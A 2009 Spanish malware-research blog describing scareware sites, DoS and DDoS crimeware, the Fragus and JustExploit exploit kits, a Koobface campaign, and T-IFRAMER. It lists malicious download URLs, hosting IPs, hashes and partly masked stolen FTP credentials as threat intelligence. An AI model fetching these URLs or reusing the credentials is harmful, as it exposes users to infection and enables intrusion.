Result: 7/40 (17.50%)

Safety Anti-Spyware
MD5: 848aea51e9d26089982c9b820c2ea4ba
IP: 212.117.177.18
Luxembourg Luxembourg Root Esolutions
Dominios asociados
safetyantispywareshop.com

Result: 1/41 (2.44%)

Antivirus Doctor
MD5: f43835e6ca25095afe53480d30a6181a
IP: 174.37.110.224
location
Dominios asociados
antivirusdoctor.net

Result: 1/41 (2.44%)

antikeep.com (83.233.30.66) - Stockholm Serverconnect I Norrland
iguardpc.com (83.233.30.66) - Stockholm Serverconnect I Norrland
quickscansecurity.cn, photoscansecurity.cn/antimalware.exe (193.169.234.27) - Jamaica Titan-net Ltd
erlsoft.in (91.212.107.38) - Cyprus Nicosia Riccom Ltd
allinoneprotection1.com/scan3/(...)MPAFM&video... (192.41.60.10) - Lindon Icon Developments
top2009securityf.cn/download/ (204.12.252.101) - Kansas City Wholesale Internet Inc
malwarebytesy0.com (96.9.180.102) - Scranton Network Operations Center Inc
apart-leo.com.uvirt3.active24.cz/adv/security.php?b=1003 (81.95.96.126) - Prague Active24-cz-servers-net
dammekro.com/webcfg/security.php?b=1003 (195.249.40.157) - Denmark Koege Teaminternet-net
siteadware.com (85.12.25.111) - Eindhoven Web10 Ict Services
theantyspywaretool.com/index.php?affid=92800 (78.129.166.11) - Cayman Islands Cayman British Islands Offshore Network
1uktimes.cn/go.php?id=2004&key=ff0057594&d=1 (91.212.226.186) - Artem Netd-lux-network

Información relacionada
Una recorrida por los últimos scareware XVII I
Una recorrida por los últimos scareware XVII
Una recorrida por los últimos scareware XV I
Una recorrida por los últimos scareware XV
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware I

Jorge Mieres

RussKill. Aplicación para realizar ataques de DoS

2009-12-15T23:59:00.000-03:00

Conceptualmente hablando, un ataque de DoS (Denegación de servicio) básicamente consiste en bombardear con solicitudes un servicio o recurso informático a fin de saturarlo y que el sistema no pueda procesar más información, de esta manera esos recursos y servicios quedan inaccesibles "denegando" el acceso a cualquiera que los solicite.

Desde el punto de vista de seguridad informática, los ataques de Denegación de Servicio constituyen una problemática importante ya que muchas botnets se encuentran diseñadas para automatizar estos ataques, sobre todo las de propósito particular, aprovechando la capacidad computacional que ofrece la red de zombis. En este caso, el ataque es denominado Denegación de Servicio Distribuido (DDoS).

Por otro lado, bajo el marco del concepto de ciberguerra (Cyber-Warfare), este tipo de ataque forma parte del armamento "bélico" virtual a través del cual las hipótesis de conflictos lo presentan entre sus requerimientos para neutralizar servicios vitales de un Estado.

RussKill es una aplicación web que se cataloga dentro de estas actividades y que a pesar de ser sumamente sencilla, tanto en las funcionalidades como en el modo de uso, representa un ataque que puede ser sumamente efectivo y difícil de detectar.

Como es habitual en el crimeware actual, la aplicación web es de origen ruso y presenta una serie de campos con información sobre cómo y contra quién llevar a cabo el ataque, permitiendo configurar la secuencia de paquetes, es decir, el flujo (Flows) en cantidad. La opción "Hide url"es una medida auto-defensiva que pretende evitar que el servidor sea detectado.

Si bien existen varios métodos de ataques de DoS, RussKill hace uso de los ataques DoS del tipo HTTP-flood y SYN-flood. En ambos casos se busca inundar los servidores víctimas a través de peticiones http y paquetes con direcciones IP de origen falsas respectivamente.

Como lo he mencionado en un principio, los ataques de denegación de servicio son un peligro latente para cualquier sistema de información, independientemente de la plataforma que soporte los servicios, y este tipo de aplicaciones, en este caso web, demuestra la facilidad con la que un ataque de estas características puede ejecutarse.

Información relacionada
DDoS Botnet. Nuevo crimeware de propósito particular

Jorge Mieres

Fusión. Un concepto adoptado por el crimeware actual II

2009-12-09T14:24:00.000-03:00

Cada vez es más habitual que en los procesos de investigación nos encontremos con que en un mismo servidor se alojan, "operando" de forma activa, varios crimeware del tipo Exploit Pack desde los cuales controlan y administran las zombis que forman parte de su negocio fraudulento.

Hace un tiempo comentábamos sobre ZeuS y ElFiesta conviviendo en un mismo entorno, y cumpliendo los mismos objetivos.

En esta oportunidad, la fusión se encuentra entre Fragus (un crimeware cada vez más conocido) y ElFiesta. Ambos paquetes se encuentran alojados en el mismo servidor. Sin embargo, aunque cabe la posibilidad, esto no significa que estén siendo operados por el mismo botmaster.

El dominio en el cual se encuentran alojados es el siguiente:

En el caso de Fragus se encuentra en http://hotgirldream.net/far/ y en el caso de ElFiesta, se aloja en otra carpeta, la ruta es http://hotgirldream.net/content/. Como podemos apreciar, comparten el servidor, cuya dirección IP es 210.51.166.233, localizado en Yizhuang Idc Of China Netcom, Beijing.

Esto demuestra que las oportunidades de "negocio" no pasan solamente por la venta de crimeware, malware, exploit pack y demás actividades fraudulentas, sino que otra de las alternativas es ofrecer la infraestructura que permita, en función de su capacidad computacional, optimizar los procesos delictivos.

Información relacionada
Fusión. Un concepto adoptado por el crimeware actual
Fragus. Nueva botnet framework In-the-Wild
ZeuS Botnet y su poder de reclutamiento zombi
ElFiesta. Reclutamiento zombi a través de múltiples amenazas

Jorge Mieres

Campaña de desinformación para propagar malware

2009-12-05T12:25:00.000-03:00

La desinformación consiste básicamente en falsear o manipular la información de manera tal que quien la recibe termine creyendo en algo completamente falso, y de lo cual el originador obtiene alguna ventaja. Por ejemplo, el rumor es una herramienta empleada en las campañas de desinformación. A su vez, la desinformación es una herramienta que permite obtener información útil en tiempo y forma (Inteligencia).

Trasladado este concepto al ámbito informático, no es ni más ni menos que una metodología de Ingeniería Social que cada vez más utilizan los desarrolladores de códigos maliciosos para intentar atraer la confianza de los usuarios y aprovecharse así de esa condición para ejecutar el proceso de infección.

Habitualmente lo vemos en las páginas que diseminan malware del tipo scareware (también conocido como rogue), donde encontramos imágenes de certificaciones como Virus Bulletin o AV-Comparatives, o algunas otras como PC Magazine o PC World que si bien no cumplen la misma función que las anteriormente ya que son revistas conocidas que gozan de "confianza" entre el público.

Otra alternativa centra sus esfuerzos en tratar de demostrar que esa "solución" (scareware) es la mejor. Esto se hace a través de falsas comparativas donde se pone en tela de juicio los niveles de detección de compañías antivirus ampliamente conocidas en el mercado.

Ambas estrategias de engaño apelan a lo que se conoce bajo el concepto de autoridad que representan estas certificaciones y publicaciones en el campo "real" de la seguridad antivirus y de la tecnología informática respectivamente.

En este sentido, recientemente he detectado otra metodología de engaño que también se encuentra orientada a emitir desinformación con el objetivo de incentivar a los usuarios a creer en la información y actuar en consecuencia.

Se trata de simular que el archivo ofrecido se encuentra libre de códigos maliciosos, apelando también a la autoridad, pero en este caso, de organizaciones que permiten verificar la integridad de los archivos a través de un proceso online que somete los archivos a las soluciones antivirus con mayor confianza en el mercado. Por ejemplo, servicios como VirusTotal o VirScan. A continuación vemos una de las capturas.

Los dominios involucrados se encuentran alojados en la IP 213.5.64.20, ubicada en los Países Bajos (Netherlands Altushost Inc) en pero no todos diseminan la amenaza. Entre ellos:

safehostingsolutions.com/download.html
fileaddiction.com/download.html
freedatatransfer.com/download.html
freedownloadthanks.com/download.html
megasecuredownload.com/download.html
qualityupload.com/download.html

Los archivos que se descargan tienen los siguientes nombres:

Hpack Generator.exe (91b31ea8c551397cd5b1d38ec1aa98dd) - Result: 8/40 (20.00%)
UAV Generator.exe – Idem
Knight Generator.exe – Idem
LG Generator.exe – Idem
Kings Generator.exe – Idem
DBlocks Generator.exe – (53e3256bef0352caf794b641f93a32d5) - Result: 6/40 (15%)

Como podemos notar, que además de la nueva propuesta de engaño que a pesar de ser bastante trivial cuenta con un alto impacto de efectividad, el nivel de detección en los dos códigos maliciosos es muy bajo; representando sólo entre el 15% y 25% de 41 motores antivirus.

No es para alarmarse pero sí para estar atentos.

Información relacionada
Una recorrida por los últimos scareware XVII I
Inteligencia informática, Seguridad de la Información y Ciber-Guerra
Técnicas de engaño que no pasan de moda

Jorge Mieres

Una breve mirada al interior de Fragus

2009-12-03T00:01:00.000-03:00

Fragus es una de las aplicaciones web desarrolladas para la gestión de zombis, de origen ruso, que con poco tiempo de vida se ha insertado al mercado clandestino de crimeware con un precio accesible (USD 800) si tenemos en cuenta las capacidades delictivas que ofrece.

Este crimeware se compone básicamente de cinco secciones: Statistics, Files, Sellers, Traffic links y Preferences. Cada una de ellas se encarga de una tarea específica y todas se complementan entre ellas.

En el panel Files se encuentra la manipulación del archivo ejecutable que será diseminado.

En Sellers encontramos la gestión de exploits. En este caso, correspondiente a la primera versión de Fragus.

En cuanto al módulo Traffic links, permite realizar la "previa" configurando el iframeado y el script que será inyectado en la página que oficiará de "conductor" para la ejecución de los exploits configurador en el panel previo, que buscaran vulnerabilidades en el equipo víctima.

Sin embargo, uno de los patrones que se identifican en cada uno de los paquetes de este estilo, es el módulo estadístico. Este módulo proporciona la información de inteligencia necesaria para que el botmaster obtenga un reporte detallado no solo de los equipos zombis sino también de ciertos aspectos necesarios para conocer en detalle qué exploit deberá ejecutar.

Otro de los patrones interesantes que podemos deducir en función de esta información es que el sistema operativo más explotado es Windows XP con Internet Explorer, que el exploit con mayor eficacia, a pesar de ser muy antiguo (MS06-014) es el que aprovecha la vulnerabilidad en MDAC y que entre los países con mayor tasa de infección son EEUU y Korea.

Este representa un escenario común donde quizás, el factor de relevancia, es la deducción de que tal vez lo común de la situación se debe al importante volumen de usuario que utiliza el sistema operativo de Microsoft de forma no licenciada, lo cual conlleva a no actualizarlo.

Por último, otro importante factor que no debe pasar desapercibido es que a los ciber-delincuentes no les interesa la controversia que existe en torno a los niveles de seguridad que ofrece uno u otro sistema operativo (Windows, GNU/Linux y Mac OS) sino que todos entran en la mismo categoría de "potenciales víctimas" porque la vulnerabilidad explota en capa 7.

Información relacionada
Fragus. Nueva botnet framework In-the-Wild
JustExploit. Nuevo Exploit Kit que explota Java
DDoS Botnet. Nuevo crimeware de propósito particular
T-IFRAMER. Kit para la inyección de malware In-the-Wild
ZoPAck. Nueva alternativa para la explotación de vulnerabilidades
ZeuS Botnet y su poder de reclutamiento zombi
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Liberty Exploit System. Otra alternativa (...) para el control de botnets

Jorge Mieres

Campaña de propagación de Koobface a través de Blogspot

2009-12-01T23:58:00.000-03:00

Una masiva campaña de propagación del gusano koobface se encuentra In-the-Wild utilizando como estrategia blogs generados desde el servicio Blogspot.

Koobface se ha transformado en una pesadilla para las redes sociales y si bien sus estrategias de propagación no cambian, este malware lleva casi dos años de actividad con una importante tasa de infección, constituyendo una de las botnets más importantes de la actualidad.

Los dominios de blogspot empleados como cobertura para la propagación son:

pannullonumair.blogspot.com
haladynalatosha.blogspot.com
macdougalmuskan.blogspot.com
mailletjamaica.blogspot.com
ledrewrooney.blogspot.com
brasenoktayoktay.blogspot.com
toludestany.blogspot.com
edgarbillison.blogspot.com
piotrowiczlyanne.blogspot.com
brochoiredeedee.blogspot.com
decuyperantohny.blogspot.com
derrenpassini.blogspot.com
elsenelsenumthun.blogspot.com
elsyelsysalah.blogspot.com
fanjonappuappu.blogspot.com
fredrikadantos.blogspot.com
genelleabril.blogspot.com
gilkerharjyot.blogspot.com
hadzilashawn.blogspot.com
insalacotecwyn.blogspot.com
janitasaels.blogspot.com
jodelinscheufler.blogspot.com
jones-allentammey.blogspot.com
jurgisbooty.blogspot.com
karanjeetisoardi.blogspot.com
dralleboyeboye.blogspot.com
maidenhermann.blogspot.com
messer-bustamantetimpriss.blogspot.com
murachaniananoushka.blogspot.com
nevnevsculthorpe.blogspot.com
parrisvistisen.blogspot.com
porierkunlekunle.blogspot.com
rotermundraimon.blogspot.com
sharonyacorvil.blogspot.com
sodorabardan.blogspot.com
tendaiblunk.blogspot.com
turskeybrianna.blogspot.com
zhuochengbate-pelletier.blogspot.com
ziziziziboyter.blogspot.com

Quien accede a alguno de estos dominios es redireccionado a una página que simula la típica pantalla de YouTube. A continuación vemos una captura.

Inmediatamente después, se intenta descargar un binario llamado "setup.exe" (md5 6d8ac41c64137c91939cced16cb5f2fe) que posee una tasa de detección media baja. Este binario, a su vez se encarga de descargar y ejecutar otros códigos maliciosos.

v2prx.exe (36/41 - 87.80%)
go.exe (7/41 - 17.07%)
fb.75.exe (22/41 - 53.66%)
v2newblogger.exe (36/41 - 87.80%)
v2captcha.exe (39/41 - 95.12%)
v2googlecheck.exe (40/41 - 97.56%)

Cada uno de estos archivos son descargados desde dominios del estilo "homemadesandwiches.com/.sys/?getexe=ff2ie.exe".

El binario v2captcha.exe se encarga de romper el captcha que solicita blogspot para el registro de blogs, creando de manera aleatoria y masiva los mismos, y redireccionando luego a la descarga de koobface a través de, como lo mencioné en un principio, una falsa página de YouTube que utiliza la misma estrategia de ingeniería social visual utilizada en otras campañas de propagación similares.

Sin lugar a dudas koobface es otro de los códigos maliciosos que se vale de la persistencia a pesar de que muchas de sus variantes son detectadas por la mayoría de las compañías antivirus.

Información relacionada
Simbiosis del malware actual. Koobface

Jorge Mieres

Compendio mensual de información. Noviembre 2009

2009-11-30T20:00:00.000-03:00

Pistus Malware Intelligence

English version

29.11.09 JustExploit. Nuevo Exploit Kit que explota Java
26.11.09 Servicio ruso en línea para comprobar la detección de malware
24.11.09 Espionaje informático a través de malware
22.11.09 DDoS Botnet. Nuevo crimeware de propósito particular
18.11.09 Una recorrida por los últimos scareware XVIII
15.11.09 T-IFRAMER. Kit para la inyección de malware In-the-Wild
06.11.09 Desarrollo de Botnets Open Source. “My last words”?
04.11.09 QuadNT System. Sistema de administración de zombis I (Windows)
02.11.09 Campaña de phishing orientada a usuarios de MSN
02.11.09 ZoPAck. Nueva alternativa para la explotación de vulnerabilidades

Evil Fingers Blog
29.11.09 JustExploit. New Exploit kit that uses vulnerabilities in Java
24.11.09 Espionage by malware
23.11.09 DDoS Botnet. New crimeware particular purpose
18.11.09 A recent tour of scareware XVIII
16.11.09 T-IFRAMER. Kit for the injection of malware In-the-Wild
13.11.09 Open Source Development Botnets. "My last words?
05.11.09 QuadNT System. Zombies Management System I (Windows)
04.11.09 Phishing campaign targeted to users of MS
01.11.09 Malware Intelligence Linkedin Group

Offensive Computing
15.11.09 T-IFRAMER. Kit for the injection of malware In-the-Wild
05.11.09 ZeuS and power Botnet zombie recruitment

ESET Latinoamérica Blog
01.12.09 Reporte mensual de amenazas de noviembre
30.11.09 Propagación de malware simulando Java Runtime
26.11.09 El grupo Miranda! como excusa para propagar malware
24.11.09 ESET Continúa educando en materia de seguridad
20.11.09 Nuevo ransomware In-the-Wild
13.11.09 Listado de programas de seguridad falsos VIII
06.11.09 Ataques de phishing a Facebook generados por ZeuS

Información relacionada
Compendio mensual de información 2009

Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Jorge Mieres

JustExploit. Nuevo Exploit Kit que explota Java

2009-11-29T21:16:00.000-03:00

La industria del crimeware sigue en constante aumento y del mismo modo la comercialización clandestina de aplicaciones web que buscan automatizar los procesos de infección a través de la explotación de vulnerabilidades.

En esta oportunidad, la propuesta se llama JustExploit. Se trata de un nuevo Exploit Pack de origen ruso que posee un condimento que cada vez está siendo tenido en cuenta con mayor fuerza entre los desarrolladores de crimeware: la explotación de vulnerabilidades en Java. Es decir, además de explotar las vulnerabilidades conocidas para MDAC y archivos PDF, explota Java en todos aquellos equipos que tengan instalado su runtime.

La captura corresponde al módulo de estadística (Inteligencia) donde claramente se observa que desde esta aplicación se está controlando un número importante de equipos que utilizan diferentes navegadores y diferentes sistemas operativos, entre los cuales se encuentra el flamante Windows Seven.

Otro dato interesante que se desprende de este módulo, es el alto índice de efectividad que posee la explotación de la vulnerabilidad en Java, teniendo, incluso, un mayor nivel de éxito con respecto a las otras dos vulnerabilidades (MDAC y PDF).

A través de un archivo "index.php" que posee un script ofuscado, JustExploit intenta ejecutar tres exploits para las vulnerabilidades CVE-2008-2992, CVE-2009-0927 y CVE-2008-5353. A continuación vemos parte del script.

Entre los archivos que se descargan, se encuentra el que explota Java, llamado sdfg.jar, con una tasa de detección baja. Según VirusTotal, sólo 15 de 41 motores antivirus.

Además, el kit incluye la descarga de los siguientes archivos maliciosos (que por el momento, también cuentan con una tasa de detección muy pobre):

example.pdf 8/41 (19.51%)
annonce.pdf 7/41 (17.07%)
load.exe 25/41 (60.98%)

Esta actividad se encuentra In-the-Wild hace un tiempo relativamente corto y constituye un peligroso vector de ataque que activamente se encuentra siendo utilizado por parte de los botmasters, y como hemos visto, con una efectividad llamativa.

Muchas gracias a la gente de MDL por la información

Información relacionada
DDoS Botnet. Nuevo crimeware de propósito particul...
T-IFRAMER. Kit para la inyección de malware In-the...
ZoPAck. Nueva alternativa para la explotación de v...
ZeuS Botnet y su poder de reclutamiento zombi
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Mirando de cerca la estructura de Unique Sploits Pack
Adrenaline botnet: zona de comando. El crimeware ruso...
YES Exploit System. Otro crimeware made in Rusia
Barracuda Bot. Botnet activamente explotada
ElFiesta. Reclutamiento zombi a través de múltiples amenazas
Malware Domain List

Jorge Mieres

Servicio ruso en línea para comprobar la detección de malware

2009-11-26T08:00:00.000-03:00

Una de las cosas que preocupan a los creadores/distribuidores de malware es saber si los antivirus son capaces de detectar sus binarios y por tanto arruinar sus planes económicos.

Una posible forma de comprobar la capacidad de detección de dichos antivirus es subir el binario a sitios como VirusTotal, que a fecha de hoy, utiliza 41 motores antivirus diferentes. El gran problema es que estos sitios suelen trabajar en colaboración con las compañías antivirus, retroalimentándolas con las muestras. Por eso, aunque en el momento del análisis es posible que sólo unos pocos de los antivirus (o ninguno en el peor de los casos) sean capaces de identificar las cualidades malignas del binario en cuestión, muy probablemente el ratio de detección subirá a toda velocidad en un breve espacio de tiempo.

Esto ha abierto un nicho de negocio, y en mayo de este año aparecieron posts en diversos foros en los que se anunciaba un nuevo servicio (en aquel momento gratuito) para analizar el grado de detección sin alertar a las casas antivirus. Nacía VirTest.

Actualmente esta página, de origen ruso (aunque posee su versión en inglés) ofrece 26 motores antivirus diferentes, con posibilidad de elegir cuáles quieres que sean utilizados para chequear la muestra. A continuación se puede ver un listado de los motores antivirus y sus respectivas versiones. En la página web especifican con detalle cada cuánto es actualizado cada uno de los antivirus, dependiendo de la política que siga cada compañía para publicar nuevas firmas.

El análisis del binario mostrará una tabla en la que se ve qué antivirus reconoce el código malicioso y cual no. Pulsando el enlace con el nombre del fichero se abrirá un recuadro en el que podemos ver información sobre el tipo de fichero y su tamaño, los distintos hashes del mismo, información sobre su estructura (si es un exe), entre otros.

Si además se pulsa sobre el enlace "See file", se mostrará un fragmento del propio fichero de 1000 bytes de tamaño.

Sin embargo, una característica añadida a este servicio que marca un diferenciador con respecto a servicios similares, es la posibilidad de analizar un crimeware del tipo Exploit Pack, dando la url en la que se encuentra alojado.

Según reza la FAQ del servicio, realmente no se chequea el script, sino el código resultante que será recibido por los distintos tipos de navegadores. Las pruebas se realizan con Firefox, IE6, IE7, IE8, Opera y Chrome.

Haciendo clic sobre alguno de los enlaces podremos ver el recuadro de antes ampliando la información sobre el análisis.

Para poder realizar uno de estos análisis es necesario crear una cuenta y disponer de efectivo en la misma, ya que se ha convertido en un servicio de pago con los siguientes precios:

El pago de las cuotas se realiza exclusivamente a través de WebMoney. Existe al menos otro servicio similar que actualmente es gratuito y se encuentra en fase Beta. Suponemos que en breve pasará a ser de pago también.

Resumiendo, una prueba más de que no sólo la explotación del malware genera beneficios, sino que también se mueve dinero en servicios paralelos a esta industria. Y en algunos casos, como el que nos ocupa, habría que ver si se puede considerar este servicio como un acto delictivo o no.

Información relacionada
Software as a Service en la industria del malware
Creación Online de malware polimórfico basado en PoisonIvy
Panorama actual del negocio originado por crimewar...
Los precios del crimeware ruso. Parte 2

Ernesto Martín
Malware Research
Pistus Malware Intelligence

Espionaje informático a través de malware

2009-11-24T08:00:00.000-03:00

Durante este mes recuerdo haber desayunado con una noticia que para muchos medios de información parecería ser novedoso o exclusivamente ligado con algunas películas de Hollywood, dándole una connotación de "sorprendente". Me refiero al espionaje a través de medios informáticos.

A continuación dejo una captura de esa noticia, en la cual se deja en evidencia que los códigos maliciosos también forman parte de las operaciones de Inteligencia en diferentes contextos, tanto desde un punto de vista netamente fraudulento (en el caso de los delincuentes informáticos) como en el que se escuda bajo la "bandera" de proteger y resguardar los intereses de un Estado (el caso de muchos servicios de Inteligencia), que buscan sacar ventajas y/o neutralizar las potenciales acciones encuadradas dentro de su marco de hostilidad.

Incluso, en muchos casos, rozando la ilegalidad de las acciones.

Según la información que se manifiesta en el artículo, el servicio de Inteligencia más importante de Israel (Mossad) ha utilizado un código malicioso del tipo troyano para obtener información confidencial y critica sobre instalaciones nucleares en Siria.

El hecho de que el Mossad utilizara un programa para hacer espionaje tampoco es una novedad ya que, al igual que su equivalente estadounidense (CIA) y muchos otros, antiguamente ha utilizado Promis como recurso de espionaje.

(Algún día quizás me anime a escribir algo sobre los programas utilizados por los servicios de Inteligencia de todo el mundo ;P)

La cuestión es que independientemente de la repercusión de la noticia, los códigos maliciosos son sin lugar a dudas uno de los programas más empleados para la obtención de información, también a nivel gubernamental y militar; incluso, entre compañías que buscan obtener datos confidenciales que permitan revelar las actividades de su competencia y ganar ventajas.

Ahora, cualquier organización o ente gubernamental puede ser víctima del espionaje informático, y estas actividades también deben ser atendidas por Seguridad de la Información. Entonces, qué se puede hacer para contrarrestar o neutralizar estas actividades, que en la mayoría de los casos se manejan al borde de lo ilegal, la verdad es que no es nada fácil. Sin embargo, aplicar una estrategia de desinformación puede ser una buena práctica de contraespionaje.

En definitiva es fácil deducir que este tipo de maniobras no son sólo acciones catalogadas como "fantasmas" o dentro del género "ciencia ficción" propias de las películas, sino que cotidianamente somos potenciales víctimas de los intentos persistentes de los desarrolladores de malware que buscan romper nuestros esquemas de seguridad para obtener información secreta.

Información relacionada
Inteligencia informática, Seguridad de la Información y Ciber-Guerra
CYBINT en el negocio de los ciber-delincuentes rusos

Jorge Mieres

DDoS Botnet. Nuevo crimeware de propósito particular

2009-11-22T01:05:00.000-03:00

Un ataque de Denegación de Servicio (DoS) consiste, básicamente, en abusar de un servicio o recurso haciendo peticiones sucesivas, ya sea de forma dolosa o culposa, que terminan por quebrar la disponibilidad de ese servicio o recurso de forma temporal o total.

Cuando este tipo de ataques se realiza empleando el poder de procesamiento de un conjunto importante de computadoras realizando el abuso de peticiones de forma sincronizada, estamos en presencia de un ataque de Denegación de Servicio Distribuida (DDoS).

Los ataques de DDoS no constituyen una novedad en la actualidad (códigos maliciosos como Blaster, diseñado para realizar este tipo de ataques contra Microsoft en el 2003, es un ejemplo clásico) y su empleo es un recurso de cualquier actividad con connotación maliciosa, incluso, mafiosa.

En este sentido, la mayoría de las botnets de propósito general contemplan como parte de su oferta delictiva, ataques de Denegación de Servicio Distribuida aprovechando las bondades que ofrecen las zombis que forman parte de la red, y las de propósito particular destinadas a realizar un tipo de ataque específico contra un objetivo también específico, son el ejemplo de la actualidad.

Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como Cyber-Warfare, y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis CYBINT (Cyber Intelligence).

Sin embargo, bajo este escenario el ataque también puede ser empleado de forma defensiva dentro de una estrategia de análisis que permita evaluar las limitaciones a las que se exponen servicios criticos de un Estado.

Pero independientemente de los propósitos que se escondan detrás del ataque, los ciber-delincuentes (sobre todo los de origen ruso) constantemente buscan facilitar el asunto ofreciendo crimeware desarrollado para ser utilizado exclusivamente con ánimos delictivos.

La cuestión es que una nueva aplicación web para el control de botnets, se encuentra In-the-Wild, comercializándose en el mercado clandestino de Rusia a un precio "competitivo". USD 350.

Este crimeware está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo SYN Flood, ICMP Flood, UDP, HTTP y HTTPS. En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP.

Entre sus funcionalidades se destacan la posibilidad de ejecutarse como un servicio (lo que forma parte de su estrategia de defensa), el control y administración (C&C) se realiza a través del protocolo HTTP, integración con otros crimeware de su estilo, registro de las actividades (logs) con información procesada sobre cada ataque (Inteligencia), entre muchas otras.

Yo creo que la investigación de este tipo de acciones delictivas debe poseer ese toque metódico que ofrecen las actividades de Inteligencia, ya que si bien para un usuario hogareño este tipo de ataques puede importar poco, no sucede lo mismo cuando lo que esta en juego son los activos de las compañías. Por lo que los profesionales de seguridad deben estar al corriente del estado del arte del crimeware, e incorporar acciones de Inteligencia en sus actividades profesionales.

Información relacionada con crimeware
Los precios del crimeware ruso. Parte 2
Comercio Ruso de versiones privadas de crimeware...
ZeuS Botnet y su poder de reclutamiento zombi
Automatización de procesos anti-análisis II
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Mirando de cerca la estructura de Unique Sploits Pack
Adrenaline botnet: zona de comando. El crimeware ruso...
YES Exploit System. Otro crimeware made in Rusia
Barracuda Bot. Botnet activamente explotada
ElFiesta. Reclutamiento zombi a través de múltiples amenazas

Información relacionada con Cyber-Warfare
Inteligencia informática, Seguridad de la Información y Ciber-Guerra
CYBINT en el negocio de los ciber-delincuentes rusos
Kremlin Kids: We Launched the Estonian Cyber War
Kremlin-backed youths launched Estonian cyberwar, says Russian official
Digital Fears Emerge After Data Siege in Estonia
Cyberattack in Estonia--what it really means

Jorge Mieres

Una recorrida por los últimos scareware XVIII

2009-11-18T22:00:00.000-03:00

Virus Protector = AntiAID, SystemVeteran, BlockProtector, SystemWarrior
IP: 85.12.25.111, 83.233.30.66
Netherlands Eindhoven Web10 Ict Services
Sweden Stockholm Serverconnect I Norrland
Dominios asociados
antiaid.com
blockkeeper.com
blockprotector.com
systemveteran.com
Pope Green Defender
IP: 99.198.98.217
United States Chicago Singlehop Inc
Dominios asociados
popegreen.com

Spyware Defender 2009
IP: 99.198.98.218
United States Chicago Singlehop Inc
Dominios asociados
cheelumtech.com

Pro Defender 2008
IP: 99.198.98.202
United States Chicago Singlehop Inc
Dominios asociados
vlachosoft.com

Proof Defender
IP: 76.76.101.85
United States Portland Donald Wildes
Dominios asociados
proofdefender.com
proofdefender2009.com
www.pdefender2009.com
www.proofdefender.com

techno-rescue.com (209.8.45.117) Herndon Beyond The Network America
besttoolsdirect.com (193.169.234.3) Jamaica Titan-net Ltd
rfastnet.com/online (213.155.22.193) Ukraine Kiev Singhajeet3 - Singh Ajeet
advanced-virus-remover2010.com (91.207.116.55) Ukraine Czech Republic Of Rays
10-open-davinci.com
advanced-virus-remover2010.com
advanced-virusremover-2009.com
advanced-virusremover2009.com
advancedvirus-remover-2010.com
advancedvirusremover-2009.com
best-scan-pc.com
best-scan-pc.net
best-scan.com
best-scanpc.com
best-scanpc.net
best-scanpc.org
cathrynzfunz.com
coolcount1.com
downloadavr6.com
downloadavr7.com
downloadavr8.com
hard-xxx-tube.com
testavrdown.com
testavrdownnew.com
vsproject.net
www.advanced-virus-remover-2009.com
www.advancedvirus-remover2009.com
www.advancedvirusremover-2009.com
www.best-scan-pc.com
www.best-scanpc.net
www.best-scanpc.org
www.hard-xxx-tube.com
www.onlinescanxppro.com
xxx-white-tube.net
xxx-white-tube.org
argentmarketingtools.com (194.60.205.20) Russian Federation Baltic Center Of Innovations Techprominvest Ltd
thetoolsbargain.com, bestalltools.com (62.90.136.210) Israel Haifa Loads

Información relacionada
Una recorrida por los últimos scareware XVII
Una recorrida por los últimos scareware XV I
Una recorrida por los últimos scareware XV
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware I

Jorge Mieres

T-IFRAMER. Kit para la inyección de malware In-the-Wild

2009-11-15T17:58:00.000-03:00

T-IFRAMER es un paquete que permite automatizar, centralizar y gestionar vía http la propagación de códigos maliciosos a través de inyección de código viral en sitios web vulnerados empleando técnicas iframe, y alimentar su botnet. A continuación vemos una captura de la pantalla de autenticación.

Si bien no se trata de un kit complejo, permite a los delincuentes informáticos gestionar la propagación de malware a través del protocolo http utilizando ataques del tipo Drive-by-Download y Drive-by-Injection mediante la inserción de etiquetas iframe en las páginas web vulneradas.

Los módulos principales son cuatro: Stats, Manager, Iframes e Injector; y cada uno de ellos posee la función principal de optimizar la diseminación de malware.

El primero de ellos (Stats) permite administrar cuentas ftp vulneradas teniendo control sobre ellas con la posibilidad de subir archivos. De esta manera, comienza uno de los ciclos de propagación de códigos maliciosos.

Este módulo de gestión posee varias categorías, entre las que se encuentran:

Iframed accounts (cuentas iframeadas). Son las páginas a las que se le ha inyectado scripts dañinos a través de la etiqueta iframe.
Not Iframed (no iframedas). Básicamente son las cuentas ftp vulneradas. En este caso se almacenan hasta el momento varias cuentas ftp:

ftp://distribs:softXP@193.xxx.xxx.66
ftp://distribs:softXP@193.xxx.xxx.66
ftp://tools:softXP@193.xxx.xxx.66
ftp://tools:softXP@193.xxx.xxx.66
ftp://tools:softXP@193.xxx.xxx.66
ftp://distribs:softXP@193.xxx.xxx.66
ftp://NST:124@80.xxx.xxx.179
ftp://NST:124@80.xxx.xxx.179
ftp://NST:124@80.xxx.xxx.179
ftp://NST:124@80.xxx.xxx.179

Good accounts (cuentas buenas). Permite establecer cuáles de las cuentas ftp vulneradas son útiles o continúan activas.
